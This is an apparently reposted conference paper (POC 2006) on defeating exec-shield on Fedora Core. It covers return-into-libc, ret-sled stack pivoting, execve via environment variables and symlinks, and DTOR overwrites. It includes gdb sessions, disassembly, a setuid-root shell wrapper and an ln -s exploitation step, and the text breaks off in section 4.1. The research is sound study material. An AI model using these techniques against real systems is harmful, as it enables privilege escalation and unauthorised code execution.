[Repost] Advanced exploitation in exec-shield (Fedora Core case study)

Author: "dong-hun you" (Xpl017Elz) in INetCop <szoahc@hotmail.com>

http://x82.inetcop.org & http://www.inetcop.org

P.S: I am worried that mistranslations may have crept in, so I have tried
     to explain the ideas with pictures and diagrams rather than words.
     Some of this content was presented at POC 2006, held in Korea.
     I have put the old concepts and the new ones together for coherence,
     so please be generous about the overlap. All of the code and exploits
     were tested on Fedora Core systems.

--[ 1 - Intro

1 - Intro

2 - Brief features of Fedora Core system (gcc + glibc + exec-shield)
  2.1 - non-executable randomization stack, malloc heap, randomization library
  2.2 - Addressing system under 16mb (NULL pointer dereference protection)
  2.3 - PIE technology (changed gcc)
  2.4 - Changed method of accessing function parameter (changed glibc)

3 - Stack based overflow exploitation on exec-shield environment
  3.1 - Exploit by moving %esp, %ebp register
  3.2 - Remote exploit by moving %esp register
  3.3 - Using exec family function and symlink
  3.4 - Using exec family function and environment variables
  3.5 - Exploit on classic shellcode library area
  3.6 - Example code

4 - How to do format string exploit on exec-shield environment
  4.1 - Remote attack by using do_system() function
  4.2 - Local exploit by moving %esp, %ebp register
  4.3 - Using __do_global_dtors_aux() function, setuid() function and do_system() function
  4.4 - Using __do_global_dtors_aux() function and exec family function
  4.5 - Changing __DTOR_END__ location (overwriting p section)
  4.6 - Format string in classic shellcode library area
  4.7 - Example code

5 - How to exploit since Fedora Core 5 system
  5.1 - Changes on main() function prolog and epilog
  5.2 - Exploit by using off-by-one exploit with %ecx register
  5.3 - Overflow exploit overwriting __DTOR_END__ section
  5.4 - Overflow exploit overwriting GLOBAL OFFSET TABLE
  5.5 - Example code

6 - Appendix
  6.1 - ret(pop %eip) remote stack overflow exploit
  6.2 - ret(pop %eip) + symlink local stack overflow exploit
  6.3 - ret(pop %eip) + environment local stack overflow exploit
      6.3.1 - execl() local exploit
      6.3.2 - execle() local exploit
      6.3.3 - execlp() local exploit
      6.3.4 - execv() local exploit
      6.3.5 - execvp() local exploit
      6.3.6 - execve() local exploit
  6.4 - library shellcode stack overflow exploit
      6.4.1 - Test exploit with strcpy function example
      6.4.2 - Test exploit with sprintf function example
  6.5 - do_system() remote format string exploit
  6.6 - p section overwrite local format string exploit
  6.7 - __do_global_dtors_aux() + exec family local format string exploit
  6.8 - library overwrite local format string exploit
  6.9 - %ecx off-by-one exploit and the test exploit
  6.10 - string copy plt + do_system() __DTOR_END__ overwrite remote stack overflow exploit
  6.11 - string copy plt + execve() __DTOR_END__ overwrite local stack overflow exploit
  6.12 - string copy plt + execve() GOT overwrite local stack overflow exploit

7 - Reference


  I first came across the Fedora Core exec-shield system at a hacking
competition two years ago. I then studied the system for a month and
presented the results at the POC 2006 (Power Of Community) conference held
in Korea. What I did was apply the existing return-into-libc technique,
which many excellent hackers had already studied, to the latest systems.
This paper contains very simple things, and you probably know many of them.

  This paper can be divided into 3 parts. The first part covers stack
overflow attacks in an exec-shield environment. The second part covers
format string attacks on exec-shield that rely on the behavior of certain
functions. The third part discusses attack techniques, both remote and
local, for the changed prolog and epilog found since Fedora Core 5.
Fedora Core ships an exec-shield kernel by default, so I will mostly talk
about Fedora Core. Naturally, these techniques can be applied to CentOS,
White Box Linux and Red Hat Enterprise Linux with little change. I strongly
recommend reading the references before reading this paper.



--[ 2 - Brief features of Fedora Core system (gcc + glibc + exec-shield)

  Fedora Core is a project run by Red Hat, which provides the technical
backing. Fedora Core (F/C from now on), unlike the old Red Hat Linux, has a
stack and heap protection system called exec-shield. Exec-shield is designed
to block the existing attacks that overflow the stack, buffers or function
pointers, and those that overwrite data structures or inject code into
them. You can find more in ANNOUNCE-exec-shield, listed as Reference 7.16.


----[ 2.1 - non-executable randomization stack, malloc heap, randomization library

  The stack, the data area and the heap area allocated by malloc() are now
non-executable, which makes classic shellcode useless. Only the area where
libraries are mapped keeps execute permission, and even that is re-mapped
to a different address on every execution. This randomization, unlike that
of Red Hat Linux 9.0, is very unpredictable. It looks very similar to the
Openwall Project (7.12) of Solar Designer and the PaX kernel system (7.13).


----[ 2.2 - Addressing system under 16mb (NULL pointer dereference protection)

  The kernel re-maps all PROT_EXEC mappings into the ascii-armor area, so
that their addresses are below 16mb. The idea comes from the fact that
attackers use a 4byte library address when they attempt an overflow on a
32bit system. With this change, the address contains a null byte, which
makes many memory-related techniques such as return-into-libc (7.2) hard
to use. Sometimes there is an easy way to get a null into the overflowed
buffer, but I am not going to talk about that in this paper. In addition,
recent changes in glibc make some library function addresses end with
null or 0x20.
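
The effect of the ascii-armor area on a string copy can be sketched as
below. This is only an illustration: the helper names are made up for this
note, and the sample addresses in the usage remark are taken from the gdb
sessions later in this paper.

```c
#include <stddef.h>
#include <stdint.h>

/* Number of bytes of a 32-bit little-endian address that a C string copy
 * (strcpy-like) transfers before it hits a 0x00 byte; 4 means "no null". */
static size_t copyable_bytes(uint32_t addr)
{
    size_t n = 0;
    while (n < 4 && ((addr >> (8 * n)) & 0xffu) != 0)
        n++;
    return n;
}

/* Every address below 16mb (0x01000000) has 0x00 as its top byte. */
static int below_16mb(uint32_t addr)
{
    return addr < 0x01000000u;
}
```

For a library address such as 0x0077d320 only the 3 low bytes can be
copied, so such an address can only be the last item of a string payload,
while a stack address such as 0xbf8b42b8 copies in full.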


----[ 2.3 - PIE technology (changed gcc)

  PIE stands for Position Independent Executable, a concept similar to the
older PIC. It is a way to protect applications from being exploited by
attacks such as buffer overflows.

----[ 2.4 - Changed method of accessing function parameter (changed glibc)

  F/C 3 ships glibc 2.3.3. This glibc accesses the command passed to
system() and the exec family functions through the %ebp register. When a
stack overflow happens, the attacker can manipulate %ebp, so there is still
a good chance to point it at a chosen command to execute.


fedora core 3 glibc 2.3.3 system():

        <system+17>: mov    0x8(%ebp),%esi                ; refers %ebp + 8

fedora core 4 glibc 2.3.5 system():

        <system+14>: mov    0x10(%esp),%edi                ; refers %esp + 16

But since glibc 2.3.5 on F/C 4, it refers to the %esp register, which a user
cannot manipulate directly. glibc-2.x.x/posix/Makefile explains why this
changed.


-bash-3.00$ pwd
/tmp/glibc-2.3.5/posix
-bash-3.00$ cat Makefile |grep fomit
CFLAGS-wordexp.os = -fomit-frame-pointer
CFLAGS-spawn.os = -fomit-frame-pointer
CFLAGS-spawnp.os = -fomit-frame-pointer
CFLAGS-spawni.os = -fomit-frame-pointer
CFLAGS-execve.os = -fomit-frame-pointer
CFLAGS-fexecve.os = -fomit-frame-pointer
CFLAGS-execv.os = -fomit-frame-pointer
CFLAGS-execle.os = -fomit-frame-pointer
CFLAGS-execl.os = -fomit-frame-pointer
CFLAGS-execvp.os = -fomit-frame-pointer
CFLAGS-execlp.os = -fomit-frame-pointer
-bash-3.00$

You can see that the library code has been changed by the
-fomit-frame-pointer option. The option is applied to the exec family
functions as well.


fedora core 3 glibc 2.3.3 execve():

        <execve+9>:  mov    0xc(%ebp),%ecx                ; second argument of execve()
        <execve+27>: mov    0x10(%ebp),%edx                ; third argument of execve()
        <execve+30>: mov    0x8(%ebp),%edi                ; first argument of execve()

fedora core 4 glibc 2.3.5 execve():

        <execve+13>: mov    0xc(%esp),%edi                ; first argument of execve()
        <execve+17>: mov    0x10(%esp),%ecx                ; second argument of execve()
        <execve+21>: mov    0x14(%esp),%edx                ; third argument of execve()

The execve() function in the old glibc (2.3.3) reads its command argument
from %ebp + 0x08, but in the later glibc (2.3.5) it reads it from
%esp + 0x0c.



--[ 3 - Stack based overflow exploitation on exec-shield environment

  Now we face some obstacles. First, library function addresses contain a
NULL byte. Second, we have to deal with glibc functions compiled with the
-fomit-frame-pointer option, under an exec-shield that makes both the stack
and the heap non-executable. Fortunately, this is not the worst situation.
In fact, we can only tell whether an attack will be a piece of cake after
analyzing the structure of the target program. Let me introduce some of the
possible techniques.


----[ 3.1 - Exploit by moving %esp, %ebp register

  Below is the easiest and most common way to attack a system whose glibc is
compiled with the -fomit-frame-pointer option. Before going into the attack
technique, I would like to show "how to move the %esp register by 4bytes".

        ret        ; pop %eip

A function normally returns to its caller by popping %eip from the stack.
This is part of the epilog process, and it moves the %esp register by
4bytes.


<- stack grows this way                                     address grows this way ->
...                          10     14     18     22 (return address moves by 4bytes)
|...--------------------------|------|------|------|-----------------------------...|
                           [ret]   [ret]  [ret] [XXXX]
                              |    ^ |    ^ |     ^
                              |    | |    | |     |
                              +----+ +----+ +-----+ (%esp register moves by 4bytes)
                              %esp+4 %esp+4 %esp+4 (stack gets smaller by pop)

With this technique, we can use values that are already on the stack in the
attack, and make a chosen stack location the argument of a function that is
called only once. In addition, we can move the stack pointer by more than
4bytes.
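
The way a run of ret addresses walks %esp up the stack can be modeled in a
few lines of C. This is a sketch, not exploit code: RET_GADGET is a
hypothetical address of a lone "ret" instruction, and the stack is just an
array of 32-bit words.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical address of a lone "ret" instruction in the target binary. */
#define RET_GADGET 0x080483f4u

/* Model of a ret sled. stack[sp] is the word %esp points to when the
 * vulnerable function executes its own ret. Every RET_GADGET word is popped
 * into %eip and immediately executes another ret, so %esp climbs one 4byte
 * word per entry. Returns the index of the first non-gadget word, i.e. the
 * value that finally lands in %eip (or len if the sled never ends). */
static size_t follow_ret_sled(const uint32_t *stack, size_t len, size_t sp)
{
    while (sp < len && stack[sp] == RET_GADGET)
        sp++;                       /* ret: pop %eip, %esp += 4 */
    return sp;
}
```

With three gadget words in front of a target address, the target is taken
from index 3, which is 12 bytes above the original return address slot.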


fedora core 5 glibc 2.4, gcc 4.1.0-3:

        <__libc_csu_init>:
        ...
        add    $0x1c,%esp
        pop    %ebx
        pop    %esi
        pop    %edi
        pop    %ebp
        ret

        <__do_global_ctors_aux>:
        ...
        add    $0x4,%esp
        pop    %ebx
        pop    %ebp
        ret

Since F/C 5, some functions that exist in every binary by default end with
an epilog that adds to %esp and pops several registers. This lets us move
the %esp register by as many bytes as we want. Under this condition it
becomes possible to demonstrate the technique of Phrack 58-4 (by Nergal,
7.7). In particular, by using the "plt" entry of a string copy function, we
can call the same function many times, and by chaining the calls
appropriately we can finally execute shellcode (see Phrack 58-4, section
3.2). We are going to talk about this in chapter 5.3.


<- stack grows this way                                    address grows this way ->
+-----------+------+------------+------------+-----------+------+------------+-----+
| func1 plt | eplg | func1_arg1 | func1_arg2 | func2 plt | eplg | func2_arg1 | ... |
+-----------+------+------------+------------+-----------+------+------------+-----+
               ^                                           ^
               |                                           |
               +-------------------------------------------+
                 (As many bytes as %esp is added or popped)
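
How far such an epilog moves %esp, and how much filler a chain entry then
needs, is simple arithmetic. The sketch below assumes 4byte arguments and
the two epilogs listed above; the struct and function names are invented
for this illustration.

```c
#include <stdint.h>

/* An epilog of the form "add $N,%esp; pop ...; pop ...; ret". */
struct epilog {
    uint32_t add_esp;   /* N in "add $N,%esp" */
    uint32_t pops;      /* number of pop instructions before ret */
};

/* Bytes that %esp climbs before the final ret reads the next address. */
static uint32_t bytes_skipped(struct epilog e)
{
    return e.add_esp + 4u * e.pops;
}

/* Filler words needed after nargs 4byte arguments so that the final ret
 * lands exactly on the next chain entry; -1 if the epilog skips too little
 * or by a non-multiple of 4. */
static int filler_words(struct epilog e, uint32_t nargs)
{
    uint32_t skip = bytes_skipped(e);
    if (skip % 4u != 0 || skip < 4u * nargs)
        return -1;
    return (int)(skip / 4u - nargs);
}
```

The __libc_csu_init epilog (add $0x1c plus 4 pops) skips 44 bytes and the
__do_global_ctors_aux epilog (add $0x4 plus 2 pops) skips 12 bytes, so a
two-argument call chained through the latter needs one filler word.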

We can also manipulate the %esp register indirectly by executing leave,
provided that we can control the %ebp register.


----[ 3.2 - Remote exploit by moving %esp register

  As an example, let me describe a remote attack on F/C 3 that moves the
%esp register. It only works under special circumstances, but it still
shows that an attack by moving %esp is possible.

First, F/C 3 has glibc 2.3.3, and in glibc 2.3.3 the __libc_start_main()
function calls _setjmp(), which gives us a very nice attack example.


fedora core 3 glibc 2.3.3, gcc 3.4.2-6.fc3:

        <__libc_start_main+160>:     call   0xf6edf720 <_setjmp>
        <_setjmp+0>: xor    %eax,%eax
        <_setjmp+2>: mov    0x4(%esp),%edx
        <_setjmp+6>: mov    %ebx,0x0(%edx)
        <_setjmp+9>: mov    %esi,0x4(%edx)
        <_setjmp+12>:        mov    %edi,0x8(%edx)        ; IMPORTANT!
        <_setjmp+15>:        lea    0x4(%esp),%ecx        ; breakpoint
        <_setjmp+19>:        mov    %ecx,0x10(%edx)
        <_setjmp+22>:        mov    0x0(%esp),%ecx
        <_setjmp+26>:        mov    %ecx,0x14(%edx)
        <_setjmp+29>:        mov    %ebp,0xc(%edx)
        <_setjmp+32>:        mov    %eax,0x18(%edx)
        <_setjmp+35>:        ret
        <_setjmp+36>:        nop

...
Breakpoint 1, 0x00a2172c in _setjmp () from /lib/tls/libc.so.6
(gdb) x $edi
0xfefffb10:     0x00b1cff4
(gdb) x $edx
0xfefffb10:     0x00b1cff4
(gdb) x $edx+8
0xfefffb18:     0xfefffb10                ; 8bytes lower
(gdb)

After this, the memory at %edx + 8 holds an address that is 8bytes lower
than its own location, i.e. the value of %edx itself. Now, what if we move
the %esp register to the old _setjmp() %edx location and then call system()?


<-- stack grows this way                                       address grows this way -->
+------------+----------+------------+------------+------------+------------+-----------+
|     buf    |   %ebp   |     ret    |   ret+4    |   ret+8    |   ret+12   |   ret+16  |
+------------+----------+------------+------------+------------+------------+-----------+
... xxxxx ... 0x70707070 main()'s ret main()'s ret main()'s ret main()'s ret  system();

The process is as follows:

(1) After overwriting %ebp with 0x70707070 as a test value, move %esp to
    the old _setjmp() %edx location by repeating ret (pop %eip).

(2) system() is called at the location of the old _setjmp() %edx, and its
    prolog pushes the old %ebp onto the stack at that location.

(3) After the prolog, the %ebp of system() points to the pushed 0x70707070.


* Stack status before attack:

fedora core 3 glibc 2.3.3, gcc 3.4.2-6.fc3:

        <_setjmp+12>:        mov    %edi,0x8(%edx)

0xfef16bf0:     0xf6fdaff4      0x00000000      0xfef16bf0
                ~~~~~~~~~~                      ~~~~~~~~~~
                     |                               |
                     +--> old _setjmp() %edx         +--> old _setjmp() %edx+8

* Stack status after attack:

fedora core 3 glibc 2.3.3, gcc 3.4.2-6.fc3:

        <system+0>:  push   %ebp                ; %ebp has 0x70707070.
        <system+1>:  mov    %esp,%ebp                ; new %ebp points to the pushed old %ebp

0xfef16bf0:     0x70707070      0x00000000      0xfef16bf0
                ~~~~~~~~~~                      ~~~~~~~~~~
                     |                               |
                     +--> system() %ebp              +--> system() function argument

system() reads its argument from %ebp+8, which points back to the pushed
value, so the above tries to execute 0x70707070 ("pppp") as a command. Thus
we can use a string like "sh" (0x6873) to execute a shell. As in this case,
you need to find useful values on the stack by repeating the ret code. This
is a small example of an exploit that uses the structure of a program. There
may be many more possibilities when it comes to real applications.
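
The three steps can be replayed on a tiny memory model. The sketch below
assumes the three stack words from the dump above (at 0xfef16bf0) and that
the overflow placed the address of system() in the first of them; the
names BASE, struct cpu, word_at and enter_system are made up for this
illustration.

```c
#include <stdint.h>

#define BASE 0xfef16bf0u   /* old _setjmp() %edx location (dump above) */

struct cpu { uint32_t esp, ebp; };

/* mem[i] models the 32-bit word at address BASE + 4*i. */
static uint32_t *word_at(uint32_t *mem, uint32_t addr)
{
    return &mem[(addr - BASE) / 4u];
}

/* Model of "ret" into system() followed by its two prolog instructions.
 * Returns the value system() then loads from 0x8(%ebp), i.e. the pointer
 * it treats as its command string. */
static uint32_t enter_system(struct cpu *c, uint32_t *mem)
{
    c->esp += 4u;                       /* ret: pop system() into %eip */
    c->esp -= 4u;                       /* push %ebp ...               */
    *word_at(mem, c->esp) = c->ebp;     /* ... old %ebp lands at BASE  */
    c->ebp = c->esp;                    /* mov %esp,%ebp               */
    return *word_at(mem, c->ebp + 8u);  /* mov 0x8(%ebp),%esi          */
}
```

Starting with %esp at BASE and %ebp = 0x70707070, the returned pointer is
BASE and the word at BASE now holds 0x70707070. If %ebp is overwritten
with 0x00006873 instead, the bytes at BASE read 73 68 00 00, i.e. "sh".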


----[ 3.3 - Using exec family function and symlink

  By moving %esp, we can search the stack for suitable values to use as
function arguments. For execve() we must find three values on the stack,
because execve() reads its arguments relative to the %esp register. You can,
of course, use execv(), which takes only 2 arguments.


* Stack status after executing exploit:

fedora core 4 glibc 2.3.5, gcc 4.0.0-8:

        <execve+0>:  push   %edi                ;  prolog
        <execve+1>:  push   %ebx

        <execve+13>: mov    0xc(%esp),%edi
        <execve+17>: mov    0x10(%esp),%ecx
        <execve+21>: mov    0x14(%esp),%edx

<- stack grows this way                                 address grows this way ->
+-------+---+---+---------------------------------------------------------------+
|  buf  |ebp|eip|                            buffer                             |
+-----------+---+---+---+---+---+---+---+---+---------------+----+----+----+----+
|XXXXXXXX...|ret|ret|ret|ret|ret|ret|ret|ret|execve()'s addr|XXXX|arg1|arg2|arg3|
+-----------+---+---+---+---+---+---+---+---+---------------+----+----+----+----+
              ^
              +---------------------------->
                          (flow)

We can see that the first argument is read from %esp+0x0c after the prolog
of execve(). When I tested on F/C 4, after moving the %esp register 9 times
by ret, I found a suitable value for the first argument of execve().
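
The 0x0c offset follows from the two pushes in the prolog shown above. As
a small sketch (the function name is invented here, and it assumes 4byte
stack slots and a function built without a frame pointer):

```c
#include <stdint.h>

/* Offset from %esp of argument n (1-based) of a function built without a
 * frame pointer, after its prolog has pushed `pushes` registers:
 * 4 bytes of return address + 4 bytes per push + 4 bytes per earlier
 * argument. */
static uint32_t arg_offset(uint32_t pushes, uint32_t n)
{
    return 4u + 4u * pushes + 4u * (n - 1u);
}
```

For execve() with its two pushes (%edi and %ebx) this gives 0x0c, 0x10 and
0x14 for the three arguments. The 4 bytes of return address are the XXXX
filler word that follows execve()'s address in the payload diagram.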


* Stack status after 9 times of repeating ret code and calling execve() function:

fedora core 4 glibc 2.3.5, gcc 4.0.0-8:

(gdb) br *execve+13
Breakpoint 2 at 0x19e1b9
(gdb) c
Continuing.

Breakpoint 2, 0x0019e1b9 in execve () from /lib/libc.so.6
(gdb) x/x $esp+0x0c
0xbf8b42b8:     0x080483b4                ; first argument of execve() function ($esp + 0x0c)
(gdb)
0xbf8b42bc:     0xbf8b42e8                ; second argument of execve() function ($esp + 0x10)
(gdb)
0xbf8b42c0:     0xbf8b4290                ; third argument of execve() function ($esp + 0x14)
(gdb) x 0x080483b4
0x80483b4 <__libc_csu_init>:    0x57e58955        ; first argument of execve() function
(gdb)
0x80483b8 <__libc_csu_init+4>:  0xec835356
(gdb)
0x80483bc <__libc_csu_init+8>:  0x0000e80c
(gdb) x 0xbf8b42e8
0xbf8b42e8:     0x00000000        ; second argument of execve() function
(gdb) x 0xbf8b4290
0xbf8b4290:     0x08048296        ; third argument of execve() function
(gdb)
0xbf8b4294:     0x08048296
(gdb)
0xbf8b4298:     0x08048296
(gdb)

This shows that %esp has moved up to a slot that holds the starting address
of the __libc_csu_init() function. The address values at that point were
stored on the stack before main(). Now that we have an address whose
contents will be executed as a command, all we need to do is create a
symlink with that name to the program that we want to execute for
privilege elevation. This symlink technique came from Lamagra (7.4).

[x82@localhost tmp]$ cat sh.c
#include <stdlib.h>     /* system() */
#include <unistd.h>     /* setuid(), setgid() */

int main()
{
        setuid(0);
        setgid(0);
        system("/bin/sh");
        return 0;
}
[x82@localhost tmp]$ gcc -o sh sh.c
[x82@localhost tmp]$ ln -s sh `printf "\x55\x89\xe5\x57\x56\x53\x83\xec\x0c\xe8"`

We can use the code bytes of __libc_csu_init() themselves as the name of the
command to execute. This is quite effective in real application exploits.
You can find more in the exploit code example.
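
The symlink name is just the bytes that execve() reads at that address, up
to the first null. The sketch below decodes the three words shown in the
gdb session above; the function name is made up for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Decode little-endian 32-bit words (as printed by gdb's x/x) into the byte
 * string that execve() would read as a path name: bytes up to, but not
 * including, the first 0x00. `out` must hold 4 * nwords bytes. Returns the
 * name length. */
static size_t name_from_words(const uint32_t *words, size_t nwords,
                              unsigned char *out)
{
    size_t n = 0;
    for (size_t i = 0; i < nwords; i++) {
        for (unsigned b = 0; b < 4; b++) {
            unsigned char c = (unsigned char)(words[i] >> (8u * b));
            if (c == 0)
                return n;
            out[n++] = c;
        }
    }
    return n;
}
```

For 0x57e58955, 0xec835356 and 0x0000e80c this yields the 10 bytes
55 89 e5 57 56 53 83 ec 0c e8, the same string passed to printf in the
ln -s command above. A name containing the byte 0x2f ('/') would be read
as a path with a directory part, so it could not be used as a single file
name.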


----[ 3.4 - Using exec family function and environment variables

  I thought of this technique when I tried a local exploit for man. It is
quite effective when the attacker can place as many ret (pop %eip) codes
as he wants. The best condition for it is a vulnerable local variable
located in a stack frame near the argument pointers and the environment
variable pointers.

The argument pointers and the environment variable pointers are arrays of
pointers, each pointing to one string. Each array always ends with a NULL,
so we can detect the end of an array by that NULL.


^
| Stack grows this way
...
+---------------------+
|  argument0 pointer  |: argument starts here.
+---------------------+
|  argument1 pointer  |
+---------------------+
|         ...         |
+---------------------+
| argument(n) pointer |
+---------------------+
|  null (0x00000000)  |: argument ends here.
+---------------------+
|   environ0 pointer  |: environment starts here.
+---------------------+
|   environ1 pointer  |
+---------------------+
|         ...         |
+---------------------+
|  environ(n) pointer |
+---------------------+
|  null (0x00000000)  |: environment ends here.
+---------------------+
...
| Address grows this way
V

Please read the FC_local_environ_bof.txt file in reference 7.18 for
background. First we pick a function whose arguments can be supplied
through environment variables, such as execve(), and assign each argument
in the environment variables. Then, by repeating ret code, we move the
%esp register to the environment variable pointers, and finally call the
exec family function.

The attack flow is the same whichever exec family function you choose.
I chose execve().


fedora core 6 glibc 2.5, gcc 4.1.1-30:

Environment variable:

+------------------+
|     "./sh"       |: will be the first argument of execve()
+------------------+
|       '\0'       |: will be the second argument of execve()
+------------------+
|       '\0'       |: will be the third argument of execve()
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+

Attack code:

All we need to do is place the execve() address 8bytes before the
environment variable pointers. By doing so, "./sh", the first environment
variable that we set, will be taken as the first argument of execve() when
execve() is called. This happens because, on entry, the function looks for
its first argument at %esp + 4bytes.

^
| stack grows this way
...
+------------------+
|      buffer      |: local variable which will be overflowed
+------------------+
|   ret(pop %eip)  |: move %esp by 4bytes
+------------------+
|   ret(pop %eip)  |
+------------------+
|   ret(pop %eip)  |
+------------------+
|   ret(pop %eip)  |
+------------------+
|        ...       |
+------------------+
|   execve() func  |: address of environment variable pointer - 8byte
+------------------+
| null(0x00000000) |: end of argument pointer
+------------------+
| environ0 pointer |: environment variable "./sh" (it will be the first argument of execve() function)
+------------------+
| environ1 pointer |: environment variable NULL pointer (it will be the second argument of execve() function)
+------------------+
| environ2 pointer |: environment variable NULL pointer (it will be the third argument of execve() function)
+------------------+
...
| address grows this way
V

There is a reason for putting the null code into the environment 5 times.
The second environment variable pointer, after the first one "./sh", must
point to 4bytes of null (0x00000000). That is why I entered 4bytes of null.
The third environment variable pointer must also point to 4bytes of null,
so I added 1 more byte of null to satisfy this condition. (You can use not
only the environment variable pointers but also the argument pointers.)
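
The count of 5 can be checked by laying the strings out in memory. The
sketch below assumes that the environment strings are stored back to back
and uses 0xbf9fffeb, the address of "./sh" in the F/C 6 debugging session
of this chapter, as the starting address; the function name is invented
for this note.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Environment strings sit back to back in memory, each followed by its
 * terminating 0x00. Given the address of the first string, fill out[i]
 * with the address the i-th environment pointer will hold. */
static void env_addresses(uint32_t first, const char *const *env, size_t n,
                          uint32_t *out)
{
    uint32_t addr = first;
    for (size_t i = 0; i < n; i++) {
        out[i] = addr;
        addr += (uint32_t)strlen(env[i]) + 1u;
    }
}
```

With "./sh" followed by five empty strings, the pointers come out as
0xbf9fffeb, 0xbf9ffff0, 0xbf9ffff1 and so on up to 0xbf9ffff4. The
second pointer covers the terminators of empty strings 1 to 4, and the
third pointer, one byte higher, needs the terminator of the fifth.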


Debugging result for fedora core 6 glibc 2.5, gcc 4.1.1-30, exploit:

[root@localhost exec]# gdb 0x82-x_execve -q
...
(gdb) r
...

Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb) x/7x $esp
0xbf9fde80:     0xbf9fffeb      0xbf9ffff0      0xbf9ffff1      0xbf9ffff2
0xbf9fde90:     0xbf9ffff3      0xbf9ffff4      0x00000000
(gdb) x/s 0xbf9fffeb
0xbf9fffeb:      "./sh"    <=== the first argument of execve()
(gdb) x/x 0xbf9ffff0
0xbf9ffff0:     0x00000000 <=== the second argument of execve()
(gdb) x/x 0xbf9ffff1
0xbf9ffff1:     0x00000000 <=== the third argument of execve()
(gdb)

The arguments are laid out as above when execve() is called. Both the second
and the third argument point to null. You can also pass null directly as
both arguments by using the argument pointer.

execve("./sh",0xbf9ffff0,0xbf9ffff1); or execve("./sh",0x00000000,0x00000000);

Please see the example exploit code for more.


----[ 3.5 - Exploit on classic shellcode library area

  Ret code and environment variable pointers are used for this technique as
well. There is nothing new about it, but it is still worthwhile because it
can execute classic shellcode. First, we should remember that classic
shellcode can run inside the library area.


[x82@localhost ~]$ cat /proc/self/maps | grep rwxp
0048a000-0048c000 rwxp 00122000 fd:00 211398     /lib/tls/libc-2.3.3.so
0048c000-0048e000 rwxp 0048c000 00:00 0
00a93000-00a94000 rwxp 00a93000 00:00 0
00c68000-00c69000 rwxp 00015000 fd:00 211343     /lib/ld-2.3.3.so
0804c000-0804d000 rwxp 00003000 fd:00 65057      /bin/cat
0804d000-0806e000 rwxp 0804d000 00:00 0
[x82@localhost ~]$

Attack process:

(1) Put the shellcode in an environment variable through execve().

(2) Do not use the copy function's library address, which is under 16 mb;
    use the copy function's plt entry instead. This way we can also supply
    the first argument of the copy function.

(3) Repeat ret code so that the shellcode environment variable pointer
    set up in step 1 becomes the second argument of the copy function.

(4) Put ret code again right after the call to the copy function. By doing
    so, the first argument of the copy function, which now holds the
    shellcode, will be called.

(5) Put an executable library address in the first argument of the copy
    function. Fortunately, the library address is located within 16mb
    (3bytes).


* fedora core 4 glibc 2.3.5, gcc 4.0.0-8:

Structure of environment variable:

+-----------+
| shellcode |
+-----------+

Making attack code:

<- Stack grows this way                                         Address grows this way ->
+-------+-----+-----+-----+-----+-----+-----+----------------------+-----+--------------+
|  buf  | ret | ret | ret | ... | ret | ret | string copy func plt | ret | library addr |
+-------+-----+-----+-----+-----+-----+-----+----------------------+-----+--------------+

The shellcode is copied into empty library space and then the ret code runs.
The library address that contains the shellcode is popped into %eip, and we
finally get a shell.

To call the copy function many times, we can use the %esp moving technique
mentioned in chapter 3.1. Because that technique can move the stack pointer
by more than 4bytes, other attack techniques become possible. See chapters
5.3 and 5.4 for more.


----[ 3.6 - Example code

  I have described several attack techniques that use %esp register
movement. The appendix code in chapter 6 demonstrates the 4 techniques
described above.

The 0x82-remote_ret.sh script in 6.1 is the remote attack code we studied
in chapter 3.2. The 0x82-break_FC4.c code in 6.2 is for the exec family
function + symlink technique of chapter 3.3. 0x82-x_execl.c,
0x82-x_execle.c, 0x82-x_execlp.c, 0x82-x_execv.c, 0x82-x_execvp.c and
0x82-x_execve.c in 6.3 are for the exec family + environment variable
attack of 3.4. Finally, 0x82-x_strcpy.c and 0x82-x_sprintf.c in 6.4 are for
the library shellcode attack of 3.5.



--[ 4 - How to do format string exploit on exec-shield environment

  Unlike with the overflow technique, moving along the stack is not easy in
a format string attack. So we will take advantage of some special functions.


----[ 4.1 - Remote attack by using do_system() function

  I found that system() calls do_system() since the glibc 2.3.3 of F/C.
The old system() called execve() internally, but the changed system() loads
the command argument into the %esi register, copies it to the %eax register
and finally passes it to do_system() as its argument.


fedora core 3 glibc 2.3.3, gcc 3.4.2-6.fc3:

        <system+17>: mov    0x8(%ebp),%esi                ; load the value at %ebp+8 into %esi
        <system+46>: mov    %esi,%eax                        ; copy %esi into %eax
        <system+62>: jmp    0x77d320 <do_system>        ; jump to do_system()

do_system() receives the command argument through the %eax register, builds
"sh -c command" and passes it to execve(). In short, do_system() uses
neither the frame pointer nor the stack pointer to receive its argument; it
only reads the %eax register. That is why we can take advantage of
do_system(). What would happen if we called do_system() from inside the
__do_global_dtors_aux() function?


fedora core 6 glibc 2.5, gcc 4.1.1-30:

        <__do_global_dtors_aux+0>:   push   %ebp
        <__do_global_dtors_aux+1>:   mov    %esp,%ebp
        <__do_global_dtors_aux+3>:   sub    $0x8,%esp
        <__do_global_dtors_aux+6>:   cmpb   $0x0,0x80495bc
        <__do_global_dtors_aux+13>:  je     0x804837b <__do_global_dtors_aux+27>
        <__do_global_dtors_aux+15>:  jmp    0x804838d <__do_global_dtors_aux+45>
        <__do_global_dtors_aux+17>:  add    $0x4,%eax      (4) advance %eax to __DTOR_END__+4
        <__do_global_dtors_aux+20>:  mov    %eax,0x80495b8
        <__do_global_dtors_aux+25>:  call   *%edx          (5) call the function stored at __DTOR_END__
        <__do_global_dtors_aux+27>:  mov    0x80495b8,%eax (1) load the address of __DTOR_END__ into %eax
        <__do_global_dtors_aux+32>:  mov    (%eax),%edx    (2) %edx gets the value stored at __DTOR_END__
        <__do_global_dtors_aux+34>:  test   %edx,%edx      (3) go back if %edx is not NULL
        <__do_global_dtors_aux+36>:  jne    0x8048371 <__do_global_dtors_aux+17>
        <__do_global_dtors_aux+38>:  movb   $0x1,0x80495bc
        <__do_global_dtors_aux+45>:  leave
        <__do_global_dtors_aux+46>:  ret
        <__do_global_dtors_aux+47>:  nop

Follow the numbered steps: first %eax is set to the address of __DTOR_END__
and %edx gets the value stored there. If %edx is not NULL, %eax advances by
4bytes (__DTOR_END__+4) and *%edx is called. The loop keeps adding 4bytes
and calling each function stored in the __DTOR_END__ section.

If the __DTOR_END__ section is overwritten with the do_system() address,
%eax will be 4bytes past __DTOR_END__ when do_system() is called. Let's
